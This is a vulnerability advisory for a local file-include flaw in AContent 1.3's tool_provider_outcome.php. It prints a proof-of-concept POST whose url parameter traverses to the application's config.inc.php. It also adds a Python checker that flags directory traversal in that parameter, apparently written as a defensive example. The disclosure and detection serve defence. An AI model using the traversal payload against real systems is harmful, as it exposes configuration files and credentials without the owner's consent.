AContent 'tool_provider_outcome.php' Local File Include Vulnerability
BID:58659
Info
| Bugtraq ID: | 58659 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 23 2013 12:00AM |
| Updated: | Mar 23 2013 12:00AM |
| Credit: | DaOne |
| Vulnerable: | Greg Gay AContent 1.3 |
| Not Vulnerable: | |
Discussion
AContent is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.
AContent 1.3 is vulnerable; other versions may also be affected.
Exploit / POC
An attacker can exploit the issue with a browser.
The following example POST data is available:
POST http://www.example.com/AContent/oauth/lti/common/tool_provider_outcome.php HTTP/1.1
grade=1&key=1&secret=secret&sourcedid=1&submit=Send%20Grade&url=../../../include/config.inc.php
Solution / Fix
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
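With no vendor patch listed, requests to the affected script can at least be screened or searched for in logs. The check below is an added example (not AContent code and not part of the original advisory); it uses the endpoint and parameter from the example request, assumes that a legitimate url value is an absolute http(s) URL, and its function names are hypothetical.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint and parameter name are taken from the advisory's example request.
ENDPOINT = "/oauth/lti/common/tool_provider_outcome.php"
PARAM = "url"


def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so nested encoding is normalised before matching."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_absolute_http_url(value):
    """Assumption: a legitimate value for this parameter is an absolute http(s) URL."""
    try:
        parts = urlsplit(value)
    except ValueError:
        return False
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def check_outcome_request(path, body):
    """Return findings for one POST, given its request path and form-encoded body."""
    if not urlsplit(path).path.endswith(ENDPOINT):
        return []
    findings = []
    # parse_qs performs the first round of percent-decoding.
    for raw in parse_qs(body, keep_blank_values=True).get(PARAM, []):
        value = fully_decode(raw).replace("\\", "/")
        if "\x00" in value:
            findings.append("null byte")
        if re.search(r"(^|/)\.\.(/|$)", value):
            findings.append("directory traversal")
        if not is_absolute_http_url(value):
            findings.append("not an absolute http(s) URL")
    return findings


if __name__ == "__main__":
    # Request path and body as shown in the advisory's example.
    path = "http://www.example.com/AContent/oauth/lti/common/tool_provider_outcome.php"
    body = ("grade=1&key=1&secret=secret&sourcedid=1&submit=Send%20Grade"
            "&url=../../../include/config.inc.php")
    print(check_outcome_request(path, body))
```

The same function can run over captured POST bodies from web server or proxy logs, or back a request filter placed in front of the application.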
References
References:
- AContent Product Page (atutor.com)
- AContent Project Page (SourceForge)